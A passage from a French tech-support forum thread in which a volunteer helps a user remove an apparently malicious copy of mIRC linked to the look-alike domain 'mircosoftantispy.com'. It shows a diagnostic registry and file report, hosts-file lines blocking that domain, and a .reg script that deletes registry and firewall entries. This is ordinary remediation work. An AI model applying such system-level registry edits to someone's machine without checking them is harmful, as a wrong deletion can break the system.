    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com\www]
    
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache]
    "C:\\Logs\\mIRC\\mirc.exe"="mIRC"
    
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache]
    "C:\\WINDOWS\\Winend\\mirc.exe"="mIRC"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCChannel"=""
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCChatMsg"=dword:00000000
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCTeamChatMsg"=dword:00000000
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCExtraSpaces"=dword:00000001
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCMaxNameLen"=dword:0000001b
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCStatsDeath"=dword:00000001
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCStatsFrags"=dword:00000001
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCStatsEff"=dword:00000000
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCProtectLogAddress"=dword:00000000
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
    "MIRCSkin"="Default (English)"
    
    "c"="V:\\eMule\\Incoming\\Jeux\\Prince.of.Persia-SKIDROW[www.TmasGames.com]\\Prince.of.Persia-SKIDROW\\sr-pop.iso"
    "i"="C:\\WINDOWS\\Winend\\mirc.exe"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\exe]
    "b"="C:\\WINDOWS\\Winend\\mirc.exe"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com\www]
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache]
    "C:\\Logs\\mIRC\\mirc.exe"="mIRC"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\mIRC]
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\mIRC\About]
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\mIRC\LastRun]
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Valve\Steam\Users\3186793\friends\23083747]
    "name"=".#oMaaaKk' - mirc #last.css"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Valve\Steam\Users\3186793\friends\23083747\NameHistory]
    "0"=".#oMaaaKk' - mirc #last.css"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Valve\Steam\Users\3186793\friends\38920006]
    "name"="mirco98/poche volte vegas"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Valve\Steam\Users\3186793\friends\38920006\NameHistory]
    "0"="mirco98/poche volte vegas"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Classes\irc\DefaultIcon]
    @="\"C:\\Logs\\mIRC\\mirc.exe\""
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Classes\irc\Shell\open\command]
    @="\"C:\\Logs\\mIRC\\mirc.exe\" %1"
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003_Classes\irc\DefaultIcon]
    @="\"C:\\Logs\\mIRC\\mirc.exe\""
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003_Classes\irc\Shell\open\command]
    @="\"C:\\Logs\\mIRC\\mirc.exe\" %1"
    
    [HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
    
    [HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]
    
    [HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
    
    [HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com\www]
    
    [HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache]
    "C:\\Logs\\mIRC\\mirc.exe"="mIRC"
    
    [HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache]
    "C:\\WINDOWS\\Winend\\mirc.exe"="mIRC"
    
    *******************
         [Fichier] 
    *******************
    
    c:\Documents and Settings\All Users\Menu Démarrer\Programmes\mIRC
    c:\Documents and Settings\All Users\Menu Démarrer\Programmes\mIRC\mIRC.lnk
    c:\Documents and Settings\lml-mike\Application Data\Microsoft\Internet Explorer\Quick Launch\mIRC.lnk
    c:\Documents and Settings\lml-mike\Application Data\mIRC
    c:\Documents and Settings\lml-mike\Application Data\mIRC\mirc.ini
    c:\Logs\mIRC
    c:\Logs\mIRC\defaults\mirc.ini
    c:\Logs\mIRC\mirc.chm
    c:\Logs\mIRC\mirc.exe
    c:\WINDOWS\Prefetch\MIRC.EXE-31799806.pf
    c:\WINDOWS\Winend\mirc.exe
    c:\WINDOWS\Winend\mirc.ini
    
    
    *********************
         [Même date] 
    *********************
    
    [17/03/2009 ] --- REP ---> C:\Program Files\Intel   
    [17/03/2009 ] --- REP ---> C:\Program Files\Marvell   
    [17/03/2009 ] --- REP ---> C:\Program Files\trend micro  
    [17/03/2009 ] ---> C:\Boot.bak   
    [17/03/2009 ] ---> C:\cmldr   
    [17/03/2009 ] ---> C:\ComboFix.txt   
    [17/03/2009 ] ---> C:\WINDOWS\fdsv.exe   
    [17/03/2009 ] ---> C:\WINDOWS\grep.exe   
    [17/03/2009 ] ---> C:\WINDOWS\KB959772.log   
    [17/03/2009 ] ---> C:\WINDOWS\NIRCMD.exe   
    [17/03/2009 ] ---> C:\WINDOWS\sed.exe   
    [17/03/2009 ] ---> C:\WINDOWS\SWREG.exe   
    [17/03/2009 ] ---> C:\WINDOWS\SWSC.exe   
    [17/03/2009 ] ---> C:\WINDOWS\SWXCACLS.exe   
    [17/03/2009 ] ---> C:\WINDOWS\system32\CSVer.dll   
    [17/03/2009 ] ---> C:\WINDOWS\VFIND.exe   
    [17/03/2009 ] ---> C:\WINDOWS\ydi.log   
    [17/03/2009 ] ---> C:\WINDOWS\YukonInstall.log   
    [17/03/2009 ] ---> C:\WINDOWS\zip.exe   
    [Répertoire ] --- REP ---> C:\Program Files\Files   
    
    
    
    Outil Aide Diagnostic By !aur3n7 Version 1.1
    ----------------------------------
    §§§§§ Fin Rapport §§§§§ 
    ----------------------------------
    
    
    
    0
  19. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Re,

    déjà, si ils ni sont pas, ajoute ceci à ton fichier hosts (dans c:\windows\system32\drivers\etc) :

    127.0.0.1 mircosoftantispy.com
    127.0.0.1 www.mircosoftantispy.com

    tout ce qui est dans C:\\Logs\\mIRC a été installé par toi ?
    0
  20. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    salut !

    Oui, tout ce qui a été installé dans ce repertoire vient de moi.

    J'ai rajouté les 2 lignes dans le fichier hosts :)
    0
  21. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Bonjour,

    on devrait pouvoir éliminer la version winend de mIRC sans toucher au reste.

    Sauvegarde quand même le contenu de C:\Logs\mIRC

    Ouvre le Bloc Notes.
    Copie le texte ci-dessous (entre les * mais sans les *) avec le texte qui se trouve dans l'espace ci-dessous (copie/colle) :

    *****************************
    REGEDIT4

    [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio­n\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio­n\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio­n\Uninstall\mIRC]
    "DisplayIcon"="C:\\Logs\\mIRC\\mirc.exe"
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
    "UninstallString"="\"C:\\Logs\\mIRC\\mirc.exe\" -uninstall"
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\WINDOWS\\Winend\\mirc.exe"=-
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\WINDOWS\\Winend\\mirc.exe"=-
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\WINDOWS\\Winend\\mirc.exe"=-
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
    [-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache]
    "C:\\WINDOWS\\Winend\\mirc.exe"=-
    [-HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
    [-HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
    [-HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
    [-HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]

    *****************************
    Clique sur "Fichier", "Enregistrer sous".
    Clique sur Bureau (dans la colonne de gauche)
    Dans Nom du fichier tu écris fix.reg
    Pour Type tu choisis "tous les fichiers" avec le menu déroulant.
    Tu cliques sur Enregistrer.
    Tu fermes le Bloc-notes

    Sur ton bureau, tu double-clique sur l'icône de Fix.reg
    Tu acceptes l'avertissement concernant la fusion
    Le fix va travailler sans se manifester.
    A la fin, tu vas voir un message disant que la fusion est terminée. Tu valides.

    essaye de supprimer C:\WINDOWS\Winend
    0
  • 1
  • 2